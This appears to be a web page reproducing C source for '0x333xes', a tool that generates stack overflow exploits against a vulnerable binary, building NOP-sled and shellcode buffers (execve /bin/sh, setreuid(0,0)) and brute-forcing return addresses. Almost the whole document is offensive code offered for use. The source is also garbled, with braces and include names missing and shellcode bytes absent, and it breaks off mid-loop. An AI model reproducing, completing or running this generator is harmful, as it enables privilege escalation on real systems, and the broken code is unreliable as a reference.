Stack overflow exploit code generator (0x333xes.c)

     * Version TXT Disponible ici *

/*  0x333xes => stack overflow exploit generator
                              *  simple stack overflow exploit generator, that
                              *  permits you to generate a -working- exploit
                              *  source code.


                              #define VERSION       "0.3"

                              #define EXPLOIT       "exploit.c"
                              #define TEST          "xes"        /* file created with test shellcode */

                              #define LIMIT         0xc0000000
                              #define XES_std       0xbffff000   /* address we start from to search for RET */
                              #define XES_env       0xbfffe0ff   /* that is not really true ... but i found
                                    * some environment variables located there ...

                              #define MAX_LENGHT    10240  /* max buffer-lenght to exploit */
                              #define MAX_EVIL      1337   /* max ret-buffer lenght */
                              #define MAX           3      /* max shellcodes supported */

                              #define fatal(x...)   { fprintf (stderr, ##x); exit(-333); }

                              typedef struct { 
                              char * sh_name;
                              char * sh_type;
                              } sharkode;

                              sharkode shark[] = {

                              " \"touch xes\" shellcode [-test only-]",
                              "unsigned char test[] =\n\t"

                              " execve(/bin/sh); [linux]",
                              "unsigned char sharkode[] =\n\t"

                              " setreuid(0,0)  shellcode",
                              "unsigned char sharkode[] =\n\t"

                              { NULL, NULL },

                              int off = 0;

                              // prototypes
                              int main (int, char * []);
                              void usage (char *);
                              void shak_list (void);
                              unsigned long xes (int); /* find correct ret address */

                              usage (char * prg)
                              fprintf (stderr, "\n [~] 0x333xes => stack overflow exploit generator v%s [~]\n", VERSION);
                              fprintf (stderr, " [~]          coded by c0wboy ~          [~] \n\n");
                              fprintf (stderr, " Usage : %s [-b binary] [-e env ] [-w switch]", prg);
                              fprintf (stderr, " [-s type] [-x] [-l lenght] [-o lenght] [-a align] [-h]\n");
                              fprintf (stderr, "\n \t-b\tbugged binary\n");
                              fprintf (stderr, " \t-e\tset environment variable bugged\n");
                              fprintf (stderr, " \t-w\tset switch bugged\n");
                              fprintf (stderr, " \t-s\tshellcode type [0-%d]\n", MAX-1);
                              fprintf (stderr, " \t-x\tshellcode list\n");
                              fprintf (stderr, " \t-l\tbuffer lenght\n");
                              fprintf (stderr, " \t-o\tevil buffer (nop+shellcode) lenght (default 1337)\n");
                              fprintf (stderr, " \t-a\talign the buffer (try 1)\n");
                              fprintf (stderr, " \t-h\tdisplay this help\n\n");

                              exit (-333);

                              shak_list (void)
                              int list;
                              fprintf (stdout, "\n [~] Shellcode Types :\n");
                              fprintf (stdout, " --------------------- \n");      

                              for (list = 0; shark[list].sh_name != NULL; ++list)
                              fprintf (stdout, " [%d] %s\n", list, shark[list].sh_name);
                              fprintf (stdout, "\n");

                              exit (-333);

                              unsigned long
                              xes (int hard)
                              char wuffer[33];
                              unsigned long xes;
                              FILE * cya, * fd;

                              if (off)

                              for (; xes < (LIMIT+333) ; xes+=300)
                              bzero (wuffer, 33);
                              sprintf (wuffer, "./exploit 0x%x", xes);

                              fprintf (stdout, " * testing 0x%x\n", xes);
                              if ((cya=popen (wuffer, "r")) == NULL)
                              fatal (" [-] Error in testing exploit ...\n\n");

                              if ((fd=fopen (TEST, "r")))
                              pclose (cya);
                              fclose (fd);
                              return xes;

                              if (!hard)
                              fprintf (stderr, "\n [-] ret address NOT found ..\n [-] we suppose :\n"
                              " [*] wrong buffer align\n [~] try to solve this problem ...\n\n");

                              return (0x333);

                              main (int argc, char * argv[])
                              int c, s=1, len=0, out=MAX_EVIL, step=0, align=0, hard=0;
                              char exe[100], *bin=NULL, *w=NULL, *env=NULL;
                              unsigned long ret_add;
                              FILE * fd;

                              while(( c = getopt (argc, argv, "xhb:e:w:s:l:o:a:")) != EOF)
                              case 'b' : bin = optarg; break;

                              case 'e' :
                              env = optarg;

                              case 'w' : w = optarg; break;

                              case 's' : /* shellcode types */
                              s = atoi (optarg);
                              if ((s<0) || (s>MAX-1))
                              usage (argv[0]);

                              case 'x' : shak_list();

                              case 'l' :
                              len = atoi (optarg);
                              if (len>MAX_LENGHT)
                              fatal (" [-] explotable-buffer is too long\n");

                              case 'o' :
                              out = atoi (optarg); 
                              if (out>MAX_EVIL)
                              fatal (" [-] ret-buffer too long\n");

                              case 'a' : align = atoi (optarg); break;
                              case 'h' : usage(argv[0]);
                              default  : usage(argv[0]);

                              if ((!bin) || (!len) || ((env) && (w)))

                              fprintf (stdout, "\n [~] 0x333xes => stack overflow exploit generator [~]\n");
                              fprintf (stdout, " [~]        coded by c0wboy ~       [~] \n\n");
                              fprintf (stdout, " [*] creating source code ...\n");

                              do_sploit :   /* when ret is found, we re-write the exploit */

                              system ("rm -rf xes");

                              if((fd = fopen (EXPLOIT, "w")) == NULL)
                              fatal (" [-] Error in creating %s\n", EXPLOIT);

                              fprintf (fd, "/*  Generated with 0x333xes ~ coded by c0wboy\n *");
                              fprintf (fd, "\n *  ~ ~\n *\n */ ");

                              /* setting header */
                              fprintf (fd, "\n#include \n#include \n#include \n");
                              fprintf (fd, "#include \n\n#define BIN\t\"%s\"\n#define NOP\t0x90\n", bin);
                              fprintf (fd, "#define BUFFER\t%i\n", len);

                              if (!env)
                              fprintf (fd, "#define OUTSIDE\t%i\n", out);

                              if (hard)
                              align = 1;

                              if (!align)
                              fprintf (fd, "#define ALIGN\t0\n");
                              fprintf (fd, "#define ALIGN\t%d\n", align);

                              if (step)
                              fprintf (fd, "#define RET\t0x%x\n", ret_add);

                              /* setting shellcode */
                              if (step)
                              fprintf (fd, "\n\n%s\n", shark[s].sh_type);
                              fprintf (fd, "\n\n%s\n", shark[0].sh_type); /* test-shellcode */

                              /* setting main() */
                              if (step)
                              fprintf (fd, "int\nmain ()\n");
                              fprintf (fd, "int\nmain (int argc, char * argv[])\n");

                              if (env)
                              fprintf (fd, "{\n   int x;\n   char buf[BUFFER], *bufz;\n");
                              fprintf (fd, "{\n   int x;\n   char buf[BUFFER], out[OUTSIDE], *bufz;\n");

                              if (step)
                              fprintf (fd, "   unsigned long ret_add = RET, *add_ptr ;\n\n");
                              fprintf (fd, "   unsigned long ret_add, *add_ptr ;\n\n"
                              "   if (argc != 2)\n      exit (-333);\n\n"
                              "   ret_add = strtoul (argv[1], &argv[1], 16);\n\n");

                              fprintf (fd, "   bufz = buf + ALIGN;\n   add_ptr = (long *)bufz;\n\n"
                              "   for (x=0; x



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